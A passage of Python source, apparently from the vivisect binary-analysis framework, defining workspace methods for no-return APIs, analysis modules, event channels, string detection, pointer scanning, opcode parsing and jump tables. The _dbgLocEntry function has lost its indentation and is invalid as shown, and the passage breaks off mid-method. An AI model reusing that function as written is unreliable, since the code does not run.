    self.setMeta('NoReturnApisVa', noret)
    self.cfctx.addNoReturnAddr(va)
def addNoReturnApi(self, funcname):
    """
    Inform vivisect code-flow disassembly that any call target
    which matches the specified name ("funcname" or "libname.funcname"
    for imports) does *not* exit and code-flow should be stopped...
    """
    # Names are matched case-insensitively via lowercasing.
    funcname = funcname.lower()
    m = self.getMeta('NoReturnApis', {})
    m[funcname] = True
    self.setMeta('NoReturnApis', m)
    noretva = self.getMeta('NoReturnApisVa', {})
    # If we already have an import entry, we need to update codeflow
    for lva, lsize, ltype, linfo in self.getImports():
        if linfo.lower() != funcname:
            continue
        self.cfctx.addNoReturnAddr(lva)
        noretva[lva] = True
    self.setMeta('NoReturnApisVa', noretva)
def addNoReturnApiRegex(self, funcre):
    '''
    Inform vivisect code-flow disassembly that any call target
    which matches the specified regex ("funcname" or "libname.funcname"
    for imports) does *not* exit and code-flow should be stopped...
    '''
    # Case-insensitive match; the raw pattern is persisted in meta so
    # later-discovered APIs can be re-checked (see checkNoRetApi).
    c = re.compile(funcre, re.IGNORECASE)
    m = self.getMeta('NoReturnApisRegex', [])
    m.append(funcre)
    self.setMeta('NoReturnApisRegex', m)
    # Apply immediately to any already-known imports.
    for lva, lsize, ltype, linfo in self.getImports():
        if c.match(linfo):
            self.addNoReturnApi(linfo)
def isNoReturnVa(self, va):
    '''
    Check if a VA is a no return API
    '''
    # Either recorded via the NoReturnApisVa meta, or marked as a
    # no-return call site in the NoReturnCalls va set.
    if self.getMeta('NoReturnApisVa', {}).get(va, False):
        return True
    return self.getVaSetRow('NoReturnCalls', va) is not None
def checkNoRetApi(self, apiname, va):
    '''
    Called as new APIs (thunks) are discovered, checks to see
    if they wrap a NoReturnApi. Updates if it is a no ret API thunk
    '''
    noretva = self.getMeta('NoReturnApisVa', {})
    # First check the registered regex patterns...
    for funcre in self.getMeta('NoReturnApisRegex', []):
        c = re.compile(funcre, re.IGNORECASE)
        if c.match(apiname):
            self.cfctx.addNoReturnAddr(va)
            noretva[va] = True
    # ...then the exact (case-insensitive) name matches.
    for funcname in self.getMeta('NoReturnApis', {}).keys():
        if funcname.lower() == apiname.lower():
            self.cfctx.addNoReturnAddr(va)
            noretva[va] = True
    self.setMeta('NoReturnApisVa', noretva)
def addAnalysisModule(self, modname):
    """
    Add an analysis module by python import path
    """
    # Re-registering the same module is a silent no-op.
    if modname in self.amods:
        return
    self.amods[modname] = self.loadModule(modname)
    self.amodlist.append(modname)
    logger.debug('Adding Analysis Module: %s', modname)
def delAnalysisModule(self, modname):
    """
    Remove an analysis module from the list used during analysis()
    """
    if modname not in self.amods:
        raise Exception("Unknown Module in delAnalysisModule: %s" % modname)
    if self.amods.pop(modname, None) is not None:
        self.amodlist.remove(modname)
def loadModule(self, modname):
    '''
    Import (if not already imported) and return the python module
    named by the dotted path modname.
    '''
    __import__(modname)
    return sys.modules[modname]
def addFuncAnalysisModule(self, modname):
    """
    Snap in a per-function analysis module (by name) which
    will be triggered during the creation of a new function
    (makeFunction).
    """
    # Re-registering the same module is a silent no-op.
    if modname in self.fmods:
        return
    self.fmods[modname] = self.loadModule(modname)
    self.fmodlist.append(modname)
    logger.debug('Adding Function Analysis Module: %s', modname)
def delFuncAnalysisModule(self, modname):
    '''
    Remove a currently registered function analysis module.

    Raises Exception when modname was never registered.

    Example:
        vw.delFuncAnalysisModule('mypkg.mymod')
    '''
    x = self.fmods.pop(modname, None)
    if x is None:
        # Bug fix: the message previously named delAnalysisModule,
        # copy/pasted from the non-function variant of this method.
        raise Exception("Unknown Module in delFuncAnalysisModule: %s" % modname)
    self.fmodlist.remove(modname)
def createEventChannel(self):
    '''
    Allocate a new event channel (backed by an empty Queue) and
    return its integer channel id.
    '''
    chanid = next(self.chanids)
    chanq = queue.Queue()
    self.chan_lookup[chanid] = chanq
    return chanid
def importWorkspace(self, wsevents):
    """
    Import and initialize data from the given vivisect workspace
    export.
    """
    # During import, if we have a server, be sure not to notify
    # the server about the events he just gave us...
    local = self.server is not None
    # Process the events from the import data...
    fe = self._fireEvent
    for event, einfo in wsevents:
        fe(event, einfo, local=local)
def exportWorkspace(self):
    '''
    Return the (probably big) list of events which define this
    workspace. NOTE: returns the live internal event list, not a copy.
    '''
    return self._event_list
def exportWorkspaceChanges(self):
    '''
    Export the list of events which have been applied to the
    workspace since the last save.
    '''
    saved = self._event_saved
    return self._event_list[saved:]
def initWorkspaceClient(self, remotevw):
    """
    Initialize this workspace as a workspace
    client to the given (potentially cobra remote)
    workspace object.

    Imports the server's full event list, then starts a daemon
    thread that follows the server's event channel to stay in sync.
    """
    uname = e_config.getusername()
    self.server = remotevw
    self.rchan = remotevw.createEventChannel()
    self.server.vprint('%s connecting...' % uname)
    wsevents = self.server.exportWorkspace()
    self.importWorkspace(wsevents)
    self.server.vprint('%s connection complete!' % uname)
    # daemon=True so the sync thread never blocks interpreter exit.
    # (Thread.setDaemon() is deprecated since Python 3.10; pass the
    # flag to the constructor instead.)
    thr = threading.Thread(target=self._clientThread, daemon=True)
    thr.start()
def _clientThread(self):
    """
    The thread that monitors events on a server to stay
    in sync. Loops until self.server is cleared; each received
    event is re-fired locally (local=True avoids echoing back).
    """
    if self.server is None:
        raise Exception("_clientThread() with no server?!?!")
    while self.server is not None:
        event, einfo = self.server.waitForEvent(self.rchan)
        self._fireEvent(event, einfo, local=True)
def waitForEvent(self, chanid, timeout=None):
    """
    Return an event,eventinfo tuple.

    Blocks on the channel's queue (up to timeout seconds when given).
    Raises Exception for an unknown channel id.
    """
    chanq = self.chan_lookup.get(chanid)
    if chanq is None:
        raise Exception("Invalid Channel")
    return chanq.get(timeout=timeout)
def deleteEventChannel(self, chanid):
    """
    Remove a previously allocated event channel from
    the workspace. Raises KeyError for an unknown channel id.
    """
    del self.chan_lookup[chanid]
def reprPointer(vw, va):
    """
    Do your best to create a humon readable name for the
    value of this pointer.

    note: This differs from parent function from envi.cli:
    * Locations database is checked
    * Strings are returned, not named (partially)
    * <function> + 0x<offset> is returned if inside a function
    * <filename> + 0x<offset> is returned instead of loc_#####

    NOTE(review): the receiver is named 'vw' rather than 'self';
    behavior is identical, it is still a normal instance method.
    """
    if va == 0:
        return "NULL"
    loc = vw.getLocation(va)
    if loc is not None:
        locva, locsz, lt, ltinfo = loc
        if lt in (LOC_STRING, LOC_UNI):
            return vw.reprVa(locva)
    # Fall back to "<mapfile> + 0x<offset>", preferring a smart name.
    mbase, msize, mperm, mfile = vw.getMemoryMap(va)
    ret = mfile + " + 0x%x" % (va - mbase)
    sym = vw.getName(va, smart=True)
    if sym is not None:
        ret = sym
    return ret
def reprVa(self, va):
    """
    A quick way for scripts to get a string for a given virtual address.
    """
    loctup = self.getLocation(va)
    if loctup is None:
        return "None"
    return self.reprLocation(loctup)
def reprLocation(self, loctup):
    '''
    Render a location tuple (va, size, ltype, tinfo) as a human
    readable string, dispatching on the location type.
    '''
    if loctup is None:
        return 'no loc info'
    lva,lsize,ltype,tinfo = loctup
    if ltype == LOC_OP:
        # tinfo carries the arch flags for the opcode.
        op = self.parseOpcode(lva, arch=tinfo & envi.ARCH_MASK)
        return repr(op)
    elif ltype == LOC_STRING:
        return repr(self.readMemory(lva, lsize).decode('utf-8'))
    elif ltype == LOC_UNI:
        # FIXME super ghetto "simple" unicode handling for now
        bytes = b''.join(self.readMemory(lva, lsize).split(b'\x00'))
        try:
            # NOTE(review): the f-prefix here is superfluous; the string
            # is %-formatted, not interpolated.
            return f"u'%s'" % bytes.decode('utf-8')
        except:
            return bytes.hex()
    elif ltype == LOC_STRUCT:
        lstruct = self.getStructure(lva, tinfo)
        return repr(lstruct)
    elif ltype == LOC_NUMBER:
        value = self.parseNumber(lva, lsize)
        # Zero-padded hex at the location's byte width.
        hexstr = "0x%%.%dx" % lsize
        hexstr = hexstr % value
        if lsize == 1:
            return "BYTE: %d (%s)" % (value, hexstr)
        else:
            return "%d BYTES: %d (%s)" % (lsize, value, hexstr)
    elif ltype == LOC_IMPORT:
        return "IMPORT: %s" % tinfo
    elif ltype == LOC_POINTER:
        # Show the pointer's first xref target.
        return "PTR: %s" % self.arch.pointerString(self.getXrefsFrom(lva)[0][XR_TO])
    else:
        # Unknown type: prefer a name, else raw hex bytes.
        n = self.getName(lva)
        if n is not None:
            return n
        return binascii.hexlify(self.readMemory(lva, lsize)).decode('utf-8')
def followPointer(self, va):
    """
    Do pointer analysis and folllow up the recomendation
    by creating locations etc...

    Returns True when a location/function was created, else False.
    """
    ltype = self.analyzePointer(va)
    # Note, we only implement the types possibly
    # returned from analyzePointer...
    if ltype == LOC_OP:
        # NOTE: currently analyzePointer returns LOC_OP
        # based on function entries, lets make a func too...
        logger.debug('discovered new function (followPointer(0x%x))', va)
        self.makeFunction(va)
        return True
    if ltype == LOC_STRING:
        self.makeString(va)
        return True
    if ltype == LOC_UNI:
        self.makeUnicode(va)
        return True
    return False
def processEntryPoints(self):
    '''
    Roll through EntryPoints and make them into functions (if not already)
    '''
    for eva in self.getEntryPoints():
        # Skip known functions and non-executable addresses.
        if self.isFunction(eva) or not self.probeMemory(eva, 1, e_mem.MM_EXEC):
            continue
        logger.debug('processEntryPoint: 0x%x', eva)
        self.makeFunction(eva)
def analyze(self):
    """
    Call this to ask any available analysis modules
    to do their thing... Runs each registered module once, in
    registration order, then prints stats and fires VWE_AUTOANALFIN.
    """
    self.vprint('Beginning analysis...')
    starttime = time.time()
    # Now lets engage any analysis modules. If any modules return
    # true, they managed to change things and we should run again...
    for mname in self.amodlist:
        mod = self.amods.get(mname)
        self.vprint("Extended Analysis: %s" % mod.__name__)
        try:
            mod.analyze(self)
        except Exception as e:
            # One failing module must not abort the whole pass.
            self.vprint("Extended Analysis Exception %s: %s" % (mod.__name__, e))
    endtime = time.time()
    self.vprint('...analysis complete! (%d sec)' % (endtime-starttime))
    self.printDiscoveredStats()
    self._fireEvent(VWE_AUTOANALFIN, (endtime, starttime))
def analyzeFunction(self, fva):
    '''
    Run every registered per-function analysis module against the
    function at fva. A module failure is reported and recorded in the
    function's meta ("<modname> fail") but does not stop the pass.
    '''
    for fmname in self.fmodlist:
        fmod = self.fmods.get(fmname)
        try:
            fmod.analyzeFunction(self, fva)
        except Exception as e:
            self.vprint("Function Analysis Exception for function 0x%x, module: %s" % (fva, fmod.__name__))
            self.vprint("Exception Traceback: %s" % traceback.format_exc())
            self.setFunctionMeta(fva, "%s fail" % fmod.__name__, traceback.format_exc())
def getStats(self):
    '''
    Return a dict of simple workspace statistics
    (function and relocation counts).
    '''
    return {
        'functions': len(self.funcmeta),
        'relocations': len(self.relocations),
    }
def printDiscoveredStats(self):
    '''
    Print (via vprint) a summary of how much of the executable surface
    area has been discovered, based on getDiscoveredInfo().
    '''
    (disc,
     undisc,
     numXrefs,
     numLocs,
     numFuncs,
     numBlocks,
     numOps,
     numUnis,
     numStrings,
     numNumbers,
     numPointers,
     numVtables) = self.getDiscoveredInfo()
    # Guard against division by zero on an empty workspace.
    percentage = disc*100.0/(disc+undisc) if disc or undisc else 0
    self.vprint("Percentage of discovered executable surface area: %.1f%% (%s / %s)" % (percentage, disc, disc+undisc))
    self.vprint(" Xrefs/Blocks/Funcs: (%s / %s / %s)" % (numXrefs, numBlocks, numFuncs))
    self.vprint(" Locs, Ops/Strings/Unicode/Nums/Ptrs/Vtables: (%s: %s / %s / %s / %s / %s / %s)" % (numLocs, numOps, numStrings, numUnis, numNumbers, numPointers, numVtables))
def getDiscoveredInfo(self):
    """
    Return a 12-tuple of workspace discovery statistics:
    (disc, undisc, numXrefs, numLocs, numFuncs, numBlocks, numOps,
     numUnis, numStrings, numNumbers, numPointers, numVtables)
    where disc/undisc are the counts of bytes with/without locations
    across all executable maps.
    """
    disc = 0
    undisc = 0
    for mva, msz, mperms, mname in self.getMemoryMaps():
        if not self.isExecutable(mva):
            continue
        # Walk the map byte-by-byte, skipping over known locations.
        off = 0
        while off < msz:
            loc = self.getLocation(mva+off)
            if loc is None:
                off += 1
                undisc += 1
            else:
                off += loc[L_SIZE]
                disc += loc[L_SIZE]
    numXrefs = len(self.getXrefs())
    numLocs = len(self.getLocations())
    numFuncs = len(self.getFunctions())
    numBlocks = len(self.getCodeBlocks())
    numOps = len(self.getLocations(LOC_OP))
    numUnis = len(self.getLocations(LOC_UNI))
    numStrings = len(self.getLocations(LOC_STRING))
    numNumbers = len(self.getLocations(LOC_NUMBER))
    numPointers = len(self.getLocations(LOC_POINTER))
    numVtables = len(self.getLocations(LOC_VFTABLE))
    return disc, undisc, numXrefs, numLocs, numFuncs, numBlocks, numOps, numUnis, numStrings, numNumbers, numPointers, numVtables
def getImports(self):
    """
    Return a list of imports, including delay imports, in location tuple format.
    """
    return list(self.getLocations(LOC_IMPORT))
def makeImport(self, va, libname, impname):
    """
    Add an import entry: names the va "<lib>.<imp>_<va>" and adds a
    pointer-sized LOC_IMPORT location. Returns the location tuple.
    """
    # '*' is the wildcard library and is not normalized.
    if libname != '*':
        libname = self.normFileName(libname)
    tinfo = "%s.%s" % (libname, impname)
    self.makeName(va, "%s_%.8x" % (tinfo, va))
    return self.addLocation(va, self.psize, LOC_IMPORT, tinfo=tinfo)
def getExports(self):
    """
    Return a list of exports in (va,etype,name,filename) tuples.
    Returns a snapshot copy of the internal list.
    """
    return list(self.exports)
def addExport(self, va, etype, name, filename, makeuniq=False):
    """
    Add an already created export object.

    makeuniq allows Vivisect to append some number to make the name unique.
    This behavior allows for colliding names (eg. different versions of a function)
    to coexist in the same workspace.

    Raises Exception when the "<filename>.<name>" name already maps to a
    different va and makeuniq is False.
    """
    rname = "%s.%s" % (filename,name)
    # check if it exists and is *not* what we're trying to make it
    curval = self.vaByName(rname)
    if curval is not None and curval != va and not makeuniq:
        # if we don't force it to make a uniq name, bail
        raise Exception("Duplicate Name: %s => 0x%x (cur: 0x%x)" % (rname, va, curval))
    rname = self.makeName(va, rname, makeuniq=makeuniq)
    self._fireEvent(VWE_ADDEXPORT, (va,etype,name,filename))
def getExport(self, va):
    """
    Get a reference to the export object at the given va
    (or none).
    """
    return self.exports_by_va.get(va)
def findPointers(self, cache=True):
    """
    Search through all currently "undefined" space and see
    if you can find pointers there... Returns a list of tuples
    where the tuple is (<ptr at>,<pts to>).

    When cache is True, a previous result stored in trans-meta is
    re-filtered (dropping entries that have since become locations or
    are misaligned) and returned without re-scanning memory.
    """
    align = self.arch.archGetPointerAlignment()
    if cache:
        ret = self.getTransMeta('findPointers')
        if ret is not None:
            # Filter locations added since last run...
            ret = [(va, x) for (va, x) in ret if self.getLocation(va) is None and not (va % align)]
            self.setTransMeta('findPointers', ret)
            return ret
    ret = []
    size = self.psize
    for mva, msize, mperm, mname in self.getMemoryMaps():
        offset, bytes = self.getByteDef(mva)
        maxsize = len(bytes) - size
        # if our memory map is not starting off aligned appropriately
        if offset % align:
            # Round offset up to the next aligned boundary.
            offset &= -align
            offset += align
        while offset + size < maxsize:
            va = mva + offset
            loctup = self.getLocation(va)
            if loctup is not None:
                # Skip over the known location, re-aligning afterwards.
                offset += loctup[L_SIZE]
                if offset % align:
                    offset += align
                    offset &= -align
                continue
            x = e_bits.parsebytes(bytes, offset, size, bigend=self.bigend)
            if self.isValidPointer(x):
                ret.append((va, x))
                offset += size
                continue
            # Not a pointer; advance one alignment unit.
            offset += align
            offset &= -align
    if cache:
        self.setTransMeta('findPointers', ret)
    return ret
def detectString(self, va):
    '''
    If the address appears to be the start of a string, then
    return the string length in bytes, else return -1.
    '''
    plen = 0 # pascal string length
    dlen = 0 # delphi string length
    left = self.getMemoryMap(va-4)
    # DEV: Make sure there's space left in the map
    if self.isReadable(va-4) and left and (left[MAP_VA] + left[MAP_SIZE] - va + 4) >= 4:
        # Length prefixes (if any) live just before the string data.
        plen = self.readMemValue(va - 2, 2) # pascal string length
        dlen = self.readMemValue(va - 4, 4) # delphi string length
    offset, bytez = self.getByteDef(va)
    maxlen = len(bytez) - offset
    count = 0
    while count < maxlen:
        # If we hit another thing, then probably not.
        # Ignore when count==0 so detection can check something
        # already set as a location.
        if count > 0:
            loc = self.getLocation(va+count)
            if loc is not None:
                if loc[L_LTYPE] == LOC_STRING:
                    if loc[L_VA] == va:
                        return loc[L_SIZE]
                    if bytez[offset+count] != 0:
                        # we probably hit a case where the string at the lower va is
                        # technically the start of the full string, but the binary does
                        # some optimizations and just ref's inside the full string to save
                        # some space
                        return count + loc[L_SIZE]
                    return loc[L_VA] - (va + count) + loc[L_SIZE]
                return -1
        c = bytez[offset+count]
        # The "strings" algo basically says 4 or more...
        if c == 0 and count >= 4:
            return count
        elif c == 0 and (count == dlen or count == plen):
            # Shorter strings are accepted when a length prefix agrees.
            return count
        if chr(c) not in string.printable:
            return -1
        count += 1
    return -1
def isProbablyString(self, va):
    '''
    Return True when detectString() finds a plausible string at va.
    '''
    return self.detectString(va) > 0
def detectUnicode(self, va):
    '''
    If the address appears to be the start of a unicode string, then
    return the string length in bytes, else return -1.

    This will return true if the memory location is likely
    *simple* UTF16-LE unicode (<ascii><0><ascii><0><0><0>).
    '''
    # FIXME this does not detect Unicode...
    offset, bytes = self.getByteDef(va)
    maxlen = len(bytes) - offset
    count = 0
    if maxlen < 2:
        return -1
    # Second byte of the first code unit; all later code units must
    # share it for the "simple" pattern to hold.
    charset = bytes[offset + 1]
    while count < maxlen:
        # If we hit another thing, then probably not.
        # Ignore when count==0 so detection can check something
        # already set as a location.
        if (count > 0):
            loc = self.getLocation(va+count)
            if loc:
                if loc[L_LTYPE] == LOC_UNI:
                    if loc[L_VA] == va:
                        return loc[L_SIZE]
                    if bytes[offset+count] != 0:
                        # same thing as in the string case, a binary can ref into a string
                        # only part of the full string.
                        return count + loc[L_SIZE]
                    return loc[L_VA] - (va + count) + loc[L_SIZE]
                return -1
        c0 = bytes[offset+count]
        if offset + count+1 >= len(bytes):
            return -1
        c1 = bytes[offset+count+1]
        # If we find our null terminator after more
        # than 4 chars, we're probably a real string
        if c0 == 0:
            if count > 8:
                return count
            return -1
        # If the first byte char isn't printable, then
        # we're probably not a real "simple" ascii string
        if chr(c0) not in string.printable:
            return -1
        # If it's not null,char,null,char then it's
        # not simple unicode...
        if c1 != charset:
            return -1
        count += 2
    return -1
def isProbablyUnicode(self, va):
    '''
    Return True when detectUnicode() finds a plausible UTF16-LE string at va.
    '''
    return self.detectUnicode(va) > 0
def isProbablyCode(self, va, **kwargs):
    """
    Most of the time, absolute pointers which point to code
    point to the function entry, so test it for the sig.

    Falls back to partial emulation from va; the verdict is memoized in
    self.iscode (pass rerun=True in kwargs to force re-evaluation).
    """
    # Non-executable memory can never be code.
    if not self.isExecutable(va):
        return False

    # A known function-prologue signature is a cheap, definitive yes.
    ret = self.isFunctionSignature(va)
    if ret:
        return ret

    rerun = kwargs.pop('rerun', False)
    # Serve the cached verdict unless the caller asked for a rerun.
    if va in self.iscode and not rerun:
        return self.iscode[va]

    # Optimistically mark True first so recursive flow into va during
    # emulation does not loop.
    self.iscode[va] = True

    # because we're doing partial emulation, demote some of the logging
    # messages to low priority.
    kwargs['loglevel'] = e_common.EMULOG
    emu = self.getEmulator(**kwargs)
    wat = v_emucode.watcher(self, va)
    emu.setEmulationMonitor(wat)
    try:
        emu.runFunction(va, maxhit=1)
    except Exception as e:
        # Emulation blowing up means the bytes do not behave like code.
        self.iscode[va] = False
        return False

    # Let the watcher decide whether the executed stream looked sane.
    if wat.looksgood():
        self.iscode[va] = True
    else:
        self.iscode[va] = False

    return self.iscode[va]
#################################################################
#
# Opcode API
#
def parseOpcode(self, va, arch=envi.ARCH_DEFAULT, skipcache=False):
    '''
    Parse an opcode from the specified virtual address.

    Example: op = m.parseOpcode(0x7c773803, skipcache=True)

    Set skipcache=True in order to bypass the opcode cache and force a reparsing of bytes
    '''
    off, b = self.getByteDef(va)
    if arch == envi.ARCH_DEFAULT:
        loctup = self.getLocation(va)
        # XXX - in the case where we've set a location on what should be an
        # opcode lets make sure L_LTYPE == LOC_OP if not lets reset L_TINFO = original arch param
        # so that at least parse opcode wont fail
        if loctup is not None and loctup[L_TINFO] and loctup[L_LTYPE] == LOC_OP:
            arch = loctup[L_TINFO]

    if not skipcache:
        # Key on the first 16 bytes as well as (va, arch) so stale entries
        # are not served after the underlying bytes change.
        key = (va, arch, b[:16])
        valu = self._op_cache.get(key, None)
        if not valu:
            # ARCH_MASK >> 16 selects the per-architecture parser index.
            valu = self.imem_archs[(arch & envi.ARCH_MASK) >> 16].archParseOpcode(b, off, va)
            self._op_cache[key] = valu
        return valu

    # skipcache: parse fresh and leave the cache untouched.
    return self.imem_archs[(arch & envi.ARCH_MASK) >> 16].archParseOpcode(b, off, va)
def clearOpcache(self):
    '''
    Drop every entry from the opcode parse cache (in place, so any
    shared references observe the flush).
    '''
    self._op_cache.clear()
def iterJumpTable(self, startva, step=None, maxiters=None, rebase=False):
    '''
    Yield destination VAs from the pointer array (jump table) at startva.

    step     - table entry width in bytes (defaults to self.psize)
    maxiters - yield at most this many entries (None = unbounded)
    rebase   - add the file's imagebase to entries smaller than it
               (tables that store image-relative values)

    Iteration stops when an entry is not a valid pointer to probable
    code, when the entry slot analyzes to a STOP_LOCS type, or when a
    later slot has xrefs pointing at it (start of another table).
    '''
    if not step:
        step = self.psize

    # Need the containing file's imagebase for the rebase option.
    fname = self.getMemoryMap(startva)
    if fname is None:
        return
    fname = fname[3]
    imgbase = self.getFileMeta(fname, 'imagebase')

    iters = 0
    ptrbase = startva
    rdest = self.readMemValue(ptrbase, step)
    if rebase and rdest < imgbase:
        rdest += imgbase

    while self.isValidPointer(rdest) and self.isProbablyCode(rdest):
        # Stop when the slot itself looks like a defined non-code location.
        if self.analyzePointer(ptrbase) in STOP_LOCS:
            break

        yield rdest

        ptrbase += step
        # An xref onto the next slot means another table begins there.
        if len(self.getXrefsTo(ptrbase)):
            break

        rdest = self.readMemValue(ptrbase, step)
        if rebase and rdest < imgbase:
            rdest += imgbase

        iters += 1
        if maxiters is not None and iters >= maxiters:
            break
def moveCodeBlock(self, cbva, newfva):
    '''
    Re-parent the code block containing cbva onto the function newfva.
    No-op when cbva has no code block or it already belongs to newfva.
    '''
    cb = self.getCodeBlock(cbva)
    if cb is None:
        return

    if cb[CB_FUNCVA] == newfva:
        return

    # BUGFIX: delCodeBlock() takes a VA (it calls getCodeBlock(va) itself),
    # and addCodeBlock() takes three positional args (va, size, funcva).
    # The old code passed the whole cb tuple to both, raising TypeErrors.
    self.delCodeBlock(cb[CB_VA])
    self.addCodeBlock(cb[CB_VA], cb[CB_SIZE], newfva)
def splitJumpTable(self, callingVa, prevRefVa, newTablAddr, rebase=False, psize=4):
    '''
    So we have the case where if we have two jump tables laid out consecutively in memory (let's
    call them tables Foo and Bar, with Foo coming before Bar), and we see Foo first, we're going to
    recognize Foo as being a giant table, with all of Bar overlapping with Foo

    So we need to construct a list of now invalid references from prevRefVa, starting at newTablAddr
    newTablAddr should point to the new jump table, and those new codeblock VAs should be removed from
    the list of references that prevRefVa refs to (and delete the name)

    We also need to check to see if the functions themselves line up (ie, do these two jump tables
    even belong to the same function, or should we remove the code block from the function entirely?)
    '''
    # Due to how codeflow happens, we have no guarantee if these two adjacent jump tables are
    # even in the same function
    codeblocks = set()
    curfva = self.getFunction(callingVa)

    # collect all the entries for the new jump table
    for cb in self.iterJumpTable(newTablAddr, rebase=rebase, step=psize):
        if cb in codeblocks:
            continue
        codeblocks.add(cb)

        prevcb = self.getCodeBlock(cb)
        if prevcb is None:
            continue

        # we may also have to break these codeblocks from the old function
        # 1 -- new func is none, old func is none
        #   * can't happen. if the codeblock is defined, we at least have an old function
        # 2 -- new func is not none, old func is none
        #   * Can't happen. see above
        # 3 -- new func is none, old func is not none
        #   * delete the codeblock. we've dropped into a new function that is different from the old
        #     since how codeflow discover functions, we should have all the code blocks for function
        # 4 -- neither are none
        #   * moveCodeBlock -- that func will handle whether or not functions are the same
        if curfva is not None:
            # BUGFIX: was moveCodeBlock(cb, curcb[CB_FUNCVA]) — `curcb` was
            # never defined (NameError). The new owning function is curfva.
            self.moveCodeBlock(cb, curfva)
        else:
            self.delCodeBlock(prevcb[CB_VA])

    # now delete those entries from the previous jump table
    # (xref tuples are (fromva, tova, rtype, rflags); index 1 is the target)
    todel = [xref for xref in self.getXrefsFrom(prevRefVa) if xref[1] in codeblocks]
    for xref in todel:
        self.setComment(xref[1], None)
        self.delXref(xref)
def makeJumpTable(self, op, tova, rebase=False, psize=4):
    '''
    Resolve the jump table at tova referenced by the table-branch opcode
    op: add a REF_CODE xref from op.va to each case target, name/comment
    the targets, and finally add a REF_PTR xref to the table itself.
    '''
    fname = self.getMemoryMap(tova)[3]
    imgbase = self.getFileMeta(fname, 'imagebase')
    ptrbase = tova

    rdest = self.readMemValue(ptrbase, psize)
    if rebase and rdest < imgbase:
        rdest += imgbase

    # if there's already an Xref to this address from another jump table, we overshot
    # the other table, and need to cut that one short, delete its Xrefs starting at this one
    # and then let the rest of this function build the new jump table
    # This jump table also may not be in the same function as the other jump table, so we need
    # to remove those codeblocks (and child codeblocks) from this function

    # at this point, rdest should be the first codeblock in the jumptable, so get all the xrefs to him
    # (but skipping over the current jumptable base address we're looking at)
    for xrfrom, xrto, rtype, rflags in self.getXrefsTo(rdest):
        if tova == xrfrom:
            continue
        refva, refsize, reftype, refinfo = self.getLocation(xrfrom)
        # Only opcode locations can be the "other" jump table's branch.
        if reftype != LOC_OP:
            continue
        # If we've already constructed this opcode location and made the xref to the new codeblock,
        # that should mean we've already made the jump table, so there should be no need to split this
        # jump table.
        if refva == op.va:
            continue
        refop = self.parseOpcode(refva)
        for refbase, refbflags in refop.getBranches():
            if refbflags & envi.BR_TABLE:
                # NOTE(review): rebase is not passed through to
                # splitJumpTable here — confirm that is intended.
                self.splitJumpTable(op.va, refva, tova, psize=psize)

    # Walk the table, adding one conditional code xref per unique target,
    # naming the first occurrence and commenting repeats.
    tabdone = {}
    for i, rdest in enumerate(self.iterJumpTable(ptrbase, rebase=rebase, step=psize)):
        if not tabdone.get(rdest):
            tabdone[rdest] = True
            self.addXref(op.va, rdest, REF_CODE, envi.BR_COND)
            if self.getName(rdest) is None:
                self.makeName(rdest, "case%d_%.8x" % (i, op.va))
        else:
            cmnt = self.getComment(rdest)
            if cmnt is None:
                self.setComment(rdest, "Other Case(s): %d" % i)
            else:
                cmnt += ", %d" % i
                self.setComment(rdest, cmnt)

    # This must be second (len(xrefsto))
    self.addXref(op.va, tova, REF_PTR)
def makeOpcode(self, va, op=None, arch=envi.ARCH_DEFAULT):
    """
    Create a single opcode location. If you have already parsed the
    opcode object, you may pass it in.

    Adds the LOC_OP location, then resolves branch targets (jump tables,
    deref branches, plain branches) and static data/pointer references.
    Raises InvalidLocation when the bytes at va cannot be decoded.
    Returns the new location tuple.
    """
    if op is None:
        try:
            op = self.parseOpcode(va, arch=arch)
        except envi.InvalidInstruction as msg:
            # FIXME something is just not right about this...
            bytez = self.readMemory(va, 16)
            # BUGFIX: the old call passed extra positional args with no format
            # placeholders ("...At:", hex(va), ...), which makes the logging
            # module raise instead of logging. Use lazy %-style args.
            logger.warning("Invalid Instruct Attempt At: 0x%x %s", va, binascii.hexlify(bytez))
            raise InvalidLocation(va, msg)
        except Exception as msg:
            raise InvalidLocation(va, msg)

    # Add our opcode location first (op flags become ldata)
    loc = self.addLocation(va, op.size, LOC_OP, op.iflags)

    # This takes care of all normal indirect immediates
    brdone = {}
    brlist = op.getBranches()
    for tova, bflags in brlist:
        # If there were unresolved dynamic branches, oh well...
        if tova is None:
            continue

        if not self.isValidPointer(tova):
            continue

        brdone[tova] = True

        # Special case, if it's a table branch, lets resolve it now.
        if bflags & envi.BR_TABLE:
            self.makeJumpTable(op, tova)

        elif bflags & envi.BR_DEREF:
            self.addXref(va, tova, REF_DATA)
            ptrdest = None
            if self.getLocation(tova) is None:
                ptrdest = self.makePointer(tova, follow=False)

            # If the actual dest is executable, make a code ref fixup
            # which *removes* the deref flag...
            # If we're an xref to something real, rip out the deref flag, but if we're
            # an xref to a big fat 0, fuggedaboutit
            if ptrdest and self.analyzePointer(ptrdest[0]):
                self.addXref(va, ptrdest[0], REF_CODE, bflags & ~envi.BR_DEREF)
            else:
                self.addXref(va, tova, REF_CODE, bflags)

        else:
            # vivisect does NOT create REF_CODE entries for
            # instruction fall through
            if bflags & envi.BR_FALL:
                continue

            self.addXref(va, tova, REF_CODE, bflags)

    # Check the instruction for static d-refs
    for oidx, o in op.genRefOpers(emu=None):
        # FIXME it would be nice if we could just do this one time
        # in the emulation pass (or hint emulation that some have already
        # been done.
        # unfortunately, emulation pass only occurs for code identified
        # within a marked function.
        # future fix: move this all into VivCodeFlowContext.

        # Does the operand touch memory ?
        if o.isDeref():
            ref = o.getOperAddr(op, None)
            if brdone.get(ref, False):
                continue

            if ref is not None and self.isValidPointer(ref):
                # It's a data reference. lets also check if the data is
                # a pointer.
                self.addXref(va, ref, REF_DATA)

                # If we don't already know what type this location is,
                # lets make it either a pointer or a number...
                if self.getLocation(ref) is None:
                    self.guessDataPointer(ref, o.tsize)
        else:
            ref = o.getOperValue(op)
            if brdone.get(ref, False):
                continue

            if ref is not None and type(ref) is int and self.isValidPointer(ref):
                self.addXref(va, ref, REF_PTR)

    return loc
def _dbgLocEntry(self, va):
"""
Display the human-happy version of a location
"""
loc = self.getLocation(va)
if loc is None:
return 'None'
lva, lsz, ltype, ltinfo = loc
ltvar = loc_lookups.get(ltype)
ltdesc = loc_type_names.get(ltype)
locrepr = '(0x%x, %d, %s, %r) # %s' % (lva, lsz, ltvar, ltinfo, ltdesc)
return locrepr
def updateCallsFrom(self, fva, ncalls):
    '''
    Merge the iterable of call-target VAs ncalls into the 'CallsFrom'
    metadata of the function containing fva.
    '''
    function = self.getFunction(fva)
